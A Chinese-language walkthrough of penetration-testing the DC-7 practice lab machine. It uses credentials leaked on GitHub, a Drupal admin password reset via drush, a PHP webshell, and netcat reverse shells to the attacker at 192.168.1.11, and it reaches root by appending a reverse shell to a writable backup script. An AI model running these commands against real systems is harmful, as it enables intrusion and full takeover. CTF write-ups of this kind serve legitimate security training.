DC-7靶机渗透测试详细教程

DC-7

攻击者kali:192.168.1.11

受害者DC-7:192.168.1.12

通过arp-sacn -l 扫描到DC-7的IP地址

使用namp扫描DC-7

nmap -sS -A -p- 192.168.1.12

发现有22和80端口

访问一下80

打开首页就直接提醒我们暴力破解是没有用的,跳出框外思考

网页右下角有个@DC7USER

百度一下

GitHub有这个

有个项目的源码，点击进去看看

配置文件里的数据库用户名账号正好是dc7user还有数据库的密码

尝试用这个账号连接ssh

连接成功！

提醒我们又封邮箱

查看一下

backups备份的意思，可能是个备份脚本，去查看一下

而且这脚本还是有权限执行的

尝试加提权命令看看

不行，不允许添加

貌似这脚本好像提示着什么

进入到/var/www/html下

drush user-password admin --password="demon"

修改管理员密码

去web页面登录一下

需要去下载php插件

php 8.x-1.x-dev | Drupal.org

下载好后上传

安装成功

点击Enable newly added modules激活模块

点击前面的三角将前几栏折回，找到PHP Filetr够选

并且点击install

安装成功

这里可以新建内容

尝试写入一句话木马，选着PHP，点击保存

显示页面

复制链接尝试用蚁剑连接看看

连接成功

进入终端反弹shell

kali端先监听

nc -lvnp 4444

蚁剑终端

nc -e /bin/sh 192.168.1.11 4444

打开交互模式

python -c 'import pty;pty.spawn("/bin/bash")'

提权想到之前那个脚本

有权限

kali再监听一个端口

nc -lvnp 6666

将反弹shell写入脚本

echo "nc -e /bin/bash 192.168.1.11 6666" >> /opt/scripts/backups.sh

然后再执行脚本

提权到root

DC-7总结

nmap扫描

注意站点信息，站外信息收集查询，查到GitHub上的源码，发现数据库账号密码

尝试进行ssh远程登录，发现邮箱，发现备份脚本的作用

修改web页面admin账号的密码登录到web界面

安装PHP插件

添加一句话木马php页面

蚁剑连接，shell反弹到kali

打开交互模式 python -c 'import pty;pty.spawn("/bin/bash")'

echo "nc -e /bin/bash 192.168.1.11 6666" >> /opt/scripts/backups.sh

修改备份脚本，并且执行，拿到root权限